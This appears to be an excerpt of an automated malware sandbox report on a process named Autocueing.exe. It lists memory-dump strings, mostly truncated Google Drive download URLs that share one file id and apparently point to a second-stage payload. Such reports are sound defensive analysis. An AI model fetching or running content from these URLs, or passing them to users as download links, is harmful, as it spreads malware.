      Source: Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/h
      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
      Source: Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830392198.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i$
      Source: Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/mPqiekafjqjNlgzAtvpzw_A7pqv34
      Source: Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/p
      Source: Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/trolno-cache
      Source: Autocueing.exe, 00000008.00000003.2635296609.0000000003440000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3393677766.000000000019B000.00000004.00000010.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv347J
      Source: Autocueing.exe, 00000008.00000003.2635296609.0000000003440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34A
      Source: Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34P
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34SH
      Source: Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34zAtvpzw_A7pqv34
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/wnload
      Source: Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
      Source: Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/xpiresSun
      Source: Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334572115.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312825589.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/~XN
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userco
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.go
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/%
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-=
      Source: Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1jcTSjYxsyVm7jljsm6mguYH2OPW7zI44BbsZwkRdo05na2bmIgphK8NDA
      Source: Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/6
      Source: Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/D
      Source: Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PqiekafjqjNlgzAtvpzw_A7pqv34&export=do4
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/ch=
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/d
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/downloaWd
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v
      Source: Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mP
      Source: Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjq
      Source: Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgz
      Source: Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtv
      Source: Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357341329.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3346141316.000000000349E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&e
      Source: Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downl
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
      Source: Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download(
      Source: Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download)
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download-P
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download//
